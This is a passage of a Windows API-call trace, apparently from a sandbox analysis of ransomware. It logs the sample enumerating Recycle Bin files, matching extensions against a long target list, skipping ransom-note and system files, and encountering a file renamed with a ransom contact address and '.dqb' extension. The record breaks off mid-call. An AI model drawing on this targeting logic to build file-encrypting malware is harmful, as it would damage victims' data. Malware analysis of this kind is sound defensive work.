[0268.852] lstrlenW (lpString=".asc") returned 4 [0268.852] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0268.852] lstrlenW (lpString=".ascx") returned 5 [0268.852] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0268.852] lstrlenW (lpString=".asm") returned 4 [0268.852] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0268.852] lstrlenW (lpString=".asmx") returned 5 [0268.852] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0268.852] lstrlenW (lpString=".asp") returned 4 [0268.852] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0268.852] lstrlenW (lpString=".aspx") returned 5 [0268.852] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0268.852] lstrlenW (lpString=".asr") returned 4 [0268.852] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0268.852] lstrlenW (lpString=".asx") returned 4 [0268.852] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0268.852] lstrlenW (lpString=".avi") returned 4 [0268.852] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0268.852] lstrlenW (lpString=".avs") returned 4 [0268.852] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0268.852] lstrlenW (lpString=".backup") returned 7 [0268.852] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0268.852] lstrlenW (lpString=".bak") returned 4 [0268.852] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0268.852] lstrlenW (lpString=".bay") returned 4 [0268.852] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0268.852] lstrlenW (lpString=".bd") returned 3 [0268.853] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0268.853] lstrlenW (lpString=".bin") returned 4 [0268.853] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0268.853] lstrlenW (lpString=".bmp") returned 4 [0268.853] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0268.853] lstrlenW (lpString=".bz2") returned 4 [0268.853] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0268.853] lstrlenW (lpString=".c") returned 2 [0268.853] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0268.853] lstrlenW (lpString=".cdr") returned 4 [0268.853] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0268.853] lstrlenW (lpString=".cer") returned 4 [0268.853] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0268.853] lstrlenW (lpString=".cf") returned 3 [0268.853] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0268.853] lstrlenW (lpString=".cfc") returned 4 [0268.853] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0268.853] lstrlenW (lpString=".cfm") returned 4 [0268.853] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0268.853] lstrlenW (lpString=".cfml") returned 5 [0268.853] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0268.853] lstrlenW (lpString=".cfu") returned 4 [0268.853] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0268.853] lstrlenW (lpString=".chm") returned 4 [0268.853] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0268.853] lstrlenW (lpString=".cin") returned 4 [0268.853] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0268.853] lstrlenW (lpString=".class") returned 6 [0268.853] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0268.853] lstrlenW (lpString=".clx") returned 4 [0268.853] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0268.853] lstrlenW (lpString=".config") returned 7 [0268.853] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0268.853] lstrlenW (lpString=".cpp") returned 4 [0268.854] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".cr2") returned 4 [0268.854] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".crt") returned 4 [0268.854] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".crw") returned 4 [0268.854] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".cs") returned 3 [0268.854] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0268.854] lstrlenW (lpString=".css") returned 4 [0268.854] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".csv") returned 4 [0268.854] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".cub") returned 4 [0268.854] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".dae") returned 4 [0268.854] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".dat") returned 4 [0268.854] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".db") returned 3 [0268.854] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0268.854] lstrlenW (lpString=".dbf") returned 4 [0268.854] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".dbx") returned 4 [0268.854] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".dc3") returned 4 [0268.854] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".dcm") returned 4 [0268.854] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".dcr") returned 4 [0268.854] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".der") returned 4 [0268.854] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0268.854] lstrlenW (lpString=".dib") returned 4 [0268.854] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0268.855] lstrlenW (lpString=".dic") returned 4 [0268.855] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0268.855] lstrlenW (lpString=".dif") returned 4 [0268.855] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0268.855] lstrlenW (lpString=".divx") returned 5 [0268.855] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0268.855] lstrlenW (lpString=".djvu") returned 5 [0268.855] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0268.855] lstrlenW (lpString=".dng") returned 4 [0268.855] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0268.855] lstrlenW (lpString=".doc") returned 4 [0268.855] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0268.855] lstrlenW (lpString=".docm") returned 5 [0268.855] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0268.855] lstrlenW (lpString=".docx") returned 5 [0268.855] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0268.855] lstrlenW (lpString=".dot") returned 4 [0268.855] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0268.855] lstrlenW (lpString=".dotm") returned 5 [0268.855] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0268.855] lstrlenW (lpString=".dotx") returned 5 [0268.855] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0268.855] lstrlenW (lpString=".dpx") returned 4 [0268.855] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0268.855] lstrlenW (lpString=".dqy") returned 4 [0268.855] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0268.855] lstrlenW (lpString=".dsn") returned 4 [0268.855] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0268.855] lstrlenW (lpString=".dt") returned 3 [0268.855] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0268.855] lstrlenW (lpString=".dtd") returned 4 [0268.855] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0268.855] lstrlenW (lpString=".dwg") returned 4 [0268.855] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0268.855] lstrlenW (lpString=".dwt") returned 4 [0268.856] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0268.856] lstrlenW (lpString=".dx") returned 3 [0268.856] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0268.856] lstrlenW (lpString=".dxf") returned 4 [0268.856] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0268.856] lstrlenW (lpString=".edml") returned 5 [0268.856] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0268.856] lstrlenW (lpString=".efd") returned 4 [0268.856] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0268.856] lstrlenW (lpString=".elf") returned 4 [0268.856] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0268.856] lstrlenW (lpString=".emf") returned 4 [0268.856] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0268.856] lstrlenW (lpString=".emz") returned 4 [0268.856] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0268.856] lstrlenW (lpString=".epf") returned 4 [0268.856] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0268.856] lstrlenW (lpString=".eps") returned 4 [0268.856] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0268.856] lstrlenW (lpString=".epsf") returned 5 [0268.856] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0268.856] lstrlenW (lpString=".epsp") returned 5 [0268.856] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0268.856] lstrlenW (lpString=".erf") returned 4 [0268.856] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0268.856] lstrlenW (lpString=".exr") returned 4 [0268.856] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0268.856] lstrlenW (lpString=".f4v") returned 4 [0268.856] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0268.856] lstrlenW (lpString=".fido") returned 5 [0268.856] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0268.856] lstrlenW (lpString=".flm") returned 4 [0268.856] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".flv") returned 4 [0268.857] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".frm") returned 4 [0268.857] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".fxg") returned 4 [0268.857] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".geo") returned 4 [0268.857] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".gif") returned 4 [0268.857] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".grs") returned 4 [0268.857] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".gz") returned 3 [0268.857] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0268.857] lstrlenW (lpString=".h") returned 2 [0268.857] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0268.857] lstrlenW (lpString=".hdr") returned 4 [0268.857] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".hpp") returned 4 [0268.857] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".hta") returned 4 [0268.857] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".htc") returned 4 [0268.857] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".htm") returned 4 [0268.857] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".html") returned 5 [0268.857] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0268.857] lstrlenW (lpString=".icb") returned 4 [0268.857] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".ics") returned 4 [0268.857] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0268.857] lstrlenW (lpString=".iff") returned 4 [0268.858] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0268.858] lstrlenW (lpString=".inc") returned 4 [0268.858] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0268.858] lstrlenW (lpString=".indd") returned 5 [0268.858] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0268.858] lstrlenW (lpString=".ini") returned 4 [0268.858] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0268.858] lstrlenW (lpString="desktop.ini") returned 11 [0268.858] lstrlenW (lpString=".dqb") returned 4 [0268.858] lstrcmpiW (lpString1=".dqb", lpString2=".ini") returned -1 [0268.858] lstrlenW (lpString="desktop.ini") returned 11 [0268.858] lstrcmpiW (lpString1="boot.ini", lpString2="desktop.ini") returned -1 [0268.858] lstrcmpiW (lpString1="bootfont.bin", lpString2="desktop.ini") returned -1 [0268.858] lstrcmpiW (lpString1="ntldr", lpString2="desktop.ini") returned 1 [0268.858] lstrcmpiW (lpString1="ntdetect.com", lpString2="desktop.ini") returned 1 [0268.858] lstrcmpiW (lpString1="io.sys", lpString2="desktop.ini") returned 1 [0268.858] lstrcmpiW (lpString1="RETURN FILES.txt", lpString2="desktop.ini") returned 1 [0268.858] lstrcmpiW (lpString1="Info.hta", lpString2="desktop.ini") returned 1 [0268.858] lstrcmpiW (lpString1="ivttvf.exe", lpString2="desktop.ini") returned 1 [0268.858] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.858] FindNextFileW (in: hFindFile=0x63d2c8, lpFindFileData=0x324f808 | out: lpFindFileData=0x324f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3c2ea030, ftCreationTime.dwHighDateTime=0x1d5351d, ftLastAccessTime.dwLowDateTime=0x3c2ea030, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3c310190, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb", cAlternateFileName="DESKTO~1.DQB")) returned 1 [0268.858] lstrlenW (lpString="desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb") returned 48 [0268.858] lstrlenW (lpString=".1cd") returned 4 [0268.858] lstrcmpiW (lpString1=".1cd", lpString2=".dqb") returned -1 [0268.858] lstrlenW (lpString=".3ds") returned 4 [0268.858] lstrcmpiW (lpString1=".3ds", lpString2=".dqb") returned -1 [0268.858] lstrlenW (lpString=".3fr") returned 4 [0268.858] lstrcmpiW (lpString1=".3fr", lpString2=".dqb") returned -1 [0268.858] lstrlenW (lpString=".3g2") returned 4 [0268.858] lstrcmpiW (lpString1=".3g2", lpString2=".dqb") returned -1 [0268.858] lstrlenW (lpString=".3gp") returned 4 [0268.858] lstrcmpiW (lpString1=".3gp", lpString2=".dqb") returned -1 [0268.859] lstrlenW (lpString=".7z") returned 3 [0268.859] lstrcmpiW (lpString1=".7z", lpString2="dqb") returned -1 [0268.859] lstrlenW (lpString=".accda") returned 6 [0268.859] lstrcmpiW (lpString1=".accda", lpString2="m].dqb") returned -1 [0268.859] lstrlenW (lpString=".accdb") returned 6 [0268.859] lstrcmpiW (lpString1=".accdb", lpString2="m].dqb") returned -1 [0268.859] lstrlenW (lpString=".accdc") returned 6 [0268.859] lstrcmpiW (lpString1=".accdc", lpString2="m].dqb") returned -1 [0268.859] lstrlenW (lpString=".accde") returned 6 [0268.859] lstrcmpiW (lpString1=".accde", lpString2="m].dqb") returned -1 [0268.859] lstrlenW (lpString=".accdt") returned 6 [0268.859] lstrcmpiW (lpString1=".accdt", lpString2="m].dqb") returned -1 [0268.859] lstrlenW (lpString=".accdw") returned 6 [0268.859] lstrcmpiW (lpString1=".accdw", lpString2="m].dqb") returned -1 [0268.859] lstrlenW (lpString=".adb") returned 4 [0268.859] lstrcmpiW (lpString1=".adb", lpString2=".dqb") returned -1 [0268.859] lstrlenW (lpString=".adp") returned 4 [0268.859] lstrcmpiW (lpString1=".adp", lpString2=".dqb") returned -1 [0268.859] lstrlenW (lpString=".ai") returned 3 [0268.859] lstrcmpiW (lpString1=".ai", lpString2="dqb") returned -1 [0268.859] lstrlenW (lpString=".ai3") returned 4 [0268.859] lstrcmpiW (lpString1=".ai3", lpString2=".dqb") returned -1 [0268.859] lstrlenW (lpString=".ai4") returned 4 [0268.859] lstrcmpiW (lpString1=".ai4", lpString2=".dqb") returned -1 [0268.859] lstrlenW (lpString=".ai5") returned 4 [0268.859] lstrcmpiW (lpString1=".ai5", lpString2=".dqb") returned -1 [0268.859] lstrlenW (lpString=".ai6") returned 4 [0268.859] lstrcmpiW (lpString1=".ai6", lpString2=".dqb") returned -1 [0268.859] lstrlenW (lpString=".ai7") returned 4 [0268.859] lstrcmpiW (lpString1=".ai7", lpString2=".dqb") returned -1 [0268.859] lstrlenW (lpString=".ai8") returned 4 [0268.859] lstrcmpiW (lpString1=".ai8", lpString2=".dqb") returned -1 [0268.859] lstrlenW (lpString=".anim") returned 5 [0268.859] lstrcmpiW (lpString1=".anim", lpString2="].dqb") returned -1 [0268.859] lstrlenW (lpString=".arw") returned 4 [0268.860] lstrcmpiW (lpString1=".arw", lpString2=".dqb") returned -1 [0268.860] lstrlenW (lpString=".as") returned 3 [0268.860] lstrcmpiW (lpString1=".as", lpString2="dqb") returned -1 [0268.860] lstrlenW (lpString=".asa") returned 4 [0268.860] lstrcmpiW (lpString1=".asa", lpString2=".dqb") returned -1 [0268.860] lstrlenW (lpString=".asc") returned 4 [0268.860] lstrcmpiW (lpString1=".asc", lpString2=".dqb") returned -1 [0268.860] lstrlenW (lpString=".ascx") returned 5 [0268.860] lstrcmpiW (lpString1=".ascx", lpString2="].dqb") returned -1 [0268.860] lstrlenW (lpString=".asm") returned 4 [0268.860] lstrcmpiW (lpString1=".asm", lpString2=".dqb") returned -1 [0268.860] lstrlenW (lpString=".asmx") returned 5 [0268.860] lstrcmpiW (lpString1=".asmx", lpString2="].dqb") returned -1 [0268.860] lstrlenW (lpString=".asp") returned 4 [0268.860] lstrcmpiW (lpString1=".asp", lpString2=".dqb") returned -1 [0268.860] lstrlenW (lpString=".aspx") returned 5 [0268.860] lstrcmpiW (lpString1=".aspx", lpString2="].dqb") returned -1 [0268.860] lstrlenW (lpString=".asr") returned 4 [0268.860] lstrcmpiW (lpString1=".asr", lpString2=".dqb") returned -1 [0268.860] lstrlenW (lpString=".asx") returned 4 [0268.860] lstrcmpiW (lpString1=".asx", lpString2=".dqb") returned -1 [0268.860] lstrlenW (lpString=".avi") returned 4 [0268.860] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0268.860] lstrlenW (lpString=".avs") returned 4 [0268.860] lstrcmpiW (lpString1=".avs", lpString2=".dqb") returned -1 [0268.860] lstrlenW (lpString=".backup") returned 7 [0268.860] lstrcmpiW (lpString1=".backup", lpString2="om].dqb") returned -1 [0268.860] lstrlenW (lpString=".bak") returned 4 [0268.860] lstrcmpiW (lpString1=".bak", lpString2=".dqb") returned -1 [0268.860] lstrlenW (lpString=".bay") returned 4 [0268.860] lstrcmpiW (lpString1=".bay", lpString2=".dqb") returned -1 [0268.860] lstrlenW (lpString=".bd") returned 3 [0268.860] lstrcmpiW (lpString1=".bd", lpString2="dqb") returned -1 [0268.860] lstrlenW (lpString=".bin") returned 4 [0268.861] lstrcmpiW (lpString1=".bin", lpString2=".dqb") returned -1 [0268.861] lstrlenW (lpString=".bmp") returned 4 [0268.861] lstrcmpiW (lpString1=".bmp", lpString2=".dqb") returned -1 [0268.861] lstrlenW (lpString=".bz2") returned 4 [0268.861] lstrcmpiW (lpString1=".bz2", lpString2=".dqb") returned -1 [0268.861] lstrlenW (lpString=".c") returned 2 [0268.861] lstrcmpiW (lpString1=".c", lpString2="qb") returned -1 [0268.861] lstrlenW (lpString=".cdr") returned 4 [0268.861] lstrcmpiW (lpString1=".cdr", lpString2=".dqb") returned -1 [0268.861] lstrlenW (lpString=".cer") returned 4 [0268.861] lstrcmpiW (lpString1=".cer", lpString2=".dqb") returned -1 [0268.861] lstrlenW (lpString=".cf") returned 3 [0268.861] lstrcmpiW (lpString1=".cf", lpString2="dqb") returned -1 [0268.861] lstrlenW (lpString=".cfc") returned 4 [0268.861] lstrcmpiW (lpString1=".cfc", lpString2=".dqb") returned -1 [0268.861] lstrlenW (lpString=".cfm") returned 4 [0268.861] lstrcmpiW (lpString1=".cfm", lpString2=".dqb") returned -1 [0268.861] lstrlenW (lpString=".cfml") returned 5 [0268.861] lstrcmpiW (lpString1=".cfml", lpString2="].dqb") returned -1 [0268.861] lstrlenW (lpString=".cfu") returned 4 [0268.861] lstrcmpiW (lpString1=".cfu", lpString2=".dqb") returned -1 [0268.861] lstrlenW (lpString=".chm") returned 4 [0268.861] lstrcmpiW (lpString1=".chm", lpString2=".dqb") returned -1 [0268.861] lstrlenW (lpString=".cin") returned 4 [0268.861] lstrcmpiW (lpString1=".cin", lpString2=".dqb") returned -1 [0268.861] lstrlenW (lpString=".class") returned 6 [0268.861] lstrcmpiW (lpString1=".class", lpString2="m].dqb") returned -1 [0268.861] lstrlenW (lpString=".clx") returned 4 [0268.861] lstrcmpiW (lpString1=".clx", lpString2=".dqb") returned -1 [0268.861] lstrlenW (lpString=".config") returned 7 [0268.861] lstrcmpiW (lpString1=".config", lpString2="om].dqb") returned -1 [0268.861] lstrlenW (lpString=".cpp") returned 4 [0268.861] lstrcmpiW (lpString1=".cpp", lpString2=".dqb") returned -1 [0268.861] lstrlenW (lpString=".cr2") returned 4 [0268.861] lstrcmpiW (lpString1=".cr2", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".crt") returned 4 [0268.862] lstrcmpiW (lpString1=".crt", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".crw") returned 4 [0268.862] lstrcmpiW (lpString1=".crw", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".cs") returned 3 [0268.862] lstrcmpiW (lpString1=".cs", lpString2="dqb") returned -1 [0268.862] lstrlenW (lpString=".css") returned 4 [0268.862] lstrcmpiW (lpString1=".css", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".csv") returned 4 [0268.862] lstrcmpiW (lpString1=".csv", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".cub") returned 4 [0268.862] lstrcmpiW (lpString1=".cub", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".dae") returned 4 [0268.862] lstrcmpiW (lpString1=".dae", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".dat") returned 4 [0268.862] lstrcmpiW (lpString1=".dat", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".db") returned 3 [0268.862] lstrcmpiW (lpString1=".db", lpString2="dqb") returned -1 [0268.862] lstrlenW (lpString=".dbf") returned 4 [0268.862] lstrcmpiW (lpString1=".dbf", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".dbx") returned 4 [0268.862] lstrcmpiW (lpString1=".dbx", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".dc3") returned 4 [0268.862] lstrcmpiW (lpString1=".dc3", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".dcm") returned 4 [0268.862] lstrcmpiW (lpString1=".dcm", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".dcr") returned 4 [0268.862] lstrcmpiW (lpString1=".dcr", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".der") returned 4 [0268.862] lstrcmpiW (lpString1=".der", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".dib") returned 4 [0268.862] lstrcmpiW (lpString1=".dib", lpString2=".dqb") returned -1 [0268.862] lstrlenW (lpString=".dic") returned 4 [0268.862] lstrcmpiW (lpString1=".dic", lpString2=".dqb") returned -1 [0268.863] lstrlenW (lpString=".dif") returned 4 [0268.863] lstrcmpiW (lpString1=".dif", lpString2=".dqb") returned -1 [0268.863] lstrlenW (lpString=".divx") returned 5 [0268.863] lstrcmpiW (lpString1=".divx", lpString2="].dqb") returned -1 [0268.863] lstrlenW (lpString=".djvu") returned 5 [0268.863] lstrcmpiW (lpString1=".djvu", lpString2="].dqb") returned -1 [0268.863] lstrlenW (lpString=".dng") returned 4 [0268.863] lstrcmpiW (lpString1=".dng", lpString2=".dqb") returned -1 [0268.863] lstrlenW (lpString=".doc") returned 4 [0268.863] lstrcmpiW (lpString1=".doc", lpString2=".dqb") returned -1 [0268.863] lstrlenW (lpString=".docm") returned 5 [0268.863] lstrcmpiW (lpString1=".docm", lpString2="].dqb") returned -1 [0268.863] lstrlenW (lpString=".docx") returned 5 [0268.863] lstrcmpiW (lpString1=".docx", lpString2="].dqb") returned -1 [0268.863] lstrlenW (lpString=".dot") returned 4 [0268.863] lstrcmpiW (lpString1=".dot", lpString2=".dqb") returned -1 [0268.863] lstrlenW (lpString=".dotm") returned 5 [0268.863] lstrcmpiW (lpString1=".dotm", lpString2="].dqb") returned -1 [0268.863] lstrlenW (lpString=".dotx") returned 5 [0268.863] lstrcmpiW (lpString1=".dotx", lpString2="].dqb") returned -1 [0268.863] lstrlenW (lpString=".dpx") returned 4 [0268.863] lstrcmpiW (lpString1=".dpx", lpString2=".dqb") returned -1 [0268.863] lstrlenW (lpString=".dqy") returned 4 [0268.863] lstrcmpiW (lpString1=".dqy", lpString2=".dqb") returned 1 [0268.863] lstrlenW (lpString=".dsn") returned 4 [0268.863] lstrcmpiW (lpString1=".dsn", lpString2=".dqb") returned 1 [0268.863] lstrlenW (lpString=".dt") returned 3 [0268.863] lstrcmpiW (lpString1=".dt", lpString2="dqb") returned -1 [0268.863] lstrlenW (lpString=".dtd") returned 4 [0268.863] lstrcmpiW (lpString1=".dtd", lpString2=".dqb") returned 1 [0268.863] lstrlenW (lpString=".dwg") returned 4 [0268.863] lstrcmpiW (lpString1=".dwg", lpString2=".dqb") returned 1 [0268.863] lstrlenW (lpString=".dwt") returned 4 [0268.863] lstrcmpiW (lpString1=".dwt", lpString2=".dqb") returned 1 [0268.864] lstrlenW (lpString=".dx") returned 3 [0268.864] lstrcmpiW (lpString1=".dx", lpString2="dqb") returned -1 [0268.864] lstrlenW (lpString=".dxf") returned 4 [0268.864] lstrcmpiW (lpString1=".dxf", lpString2=".dqb") returned 1 [0268.864] lstrlenW (lpString=".edml") returned 5 [0268.864] lstrcmpiW (lpString1=".edml", lpString2="].dqb") returned -1 [0268.864] lstrlenW (lpString=".efd") returned 4 [0268.864] lstrcmpiW (lpString1=".efd", lpString2=".dqb") returned 1 [0268.864] lstrlenW (lpString=".elf") returned 4 [0268.864] lstrcmpiW (lpString1=".elf", lpString2=".dqb") returned 1 [0268.864] lstrlenW (lpString=".emf") returned 4 [0268.864] lstrcmpiW (lpString1=".emf", lpString2=".dqb") returned 1 [0268.864] lstrlenW (lpString=".emz") returned 4 [0268.864] lstrcmpiW (lpString1=".emz", lpString2=".dqb") returned 1 [0268.864] lstrlenW (lpString=".epf") returned 4 [0268.864] lstrcmpiW (lpString1=".epf", lpString2=".dqb") returned 1 [0268.864] lstrlenW (lpString=".eps") returned 4 [0268.864] lstrcmpiW (lpString1=".eps", lpString2=".dqb") returned 1 [0268.864] lstrlenW (lpString=".epsf") returned 5 [0268.864] lstrcmpiW (lpString1=".epsf", lpString2="].dqb") returned -1 [0268.864] lstrlenW (lpString=".epsp") returned 5 [0268.864] lstrcmpiW (lpString1=".epsp", lpString2="].dqb") returned -1 [0268.864] lstrlenW (lpString=".erf") returned 4 [0268.864] lstrcmpiW (lpString1=".erf", lpString2=".dqb") returned 1 [0268.864] lstrlenW (lpString=".exr") returned 4 [0268.864] lstrcmpiW (lpString1=".exr", lpString2=".dqb") returned 1 [0268.864] lstrlenW (lpString=".f4v") returned 4 [0268.864] lstrcmpiW (lpString1=".f4v", lpString2=".dqb") returned 1 [0268.864] lstrlenW (lpString=".fido") returned 5 [0268.864] lstrcmpiW (lpString1=".fido", lpString2="].dqb") returned -1 [0268.864] lstrlenW (lpString=".flm") returned 4 [0268.864] lstrcmpiW (lpString1=".flm", lpString2=".dqb") returned 1 [0268.864] lstrlenW (lpString=".flv") returned 4 [0268.865] lstrcmpiW (lpString1=".flv", lpString2=".dqb") returned 1 [0268.865] lstrlenW (lpString=".frm") returned 4 [0268.865] lstrcmpiW (lpString1=".frm", lpString2=".dqb") returned 1 [0268.867] FindNextFileW (in: hFindFile=0x659180, lpFindFileData=0x324fa84 | out: lpFindFileData=0x324fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3c3362f0, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3c3362f0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 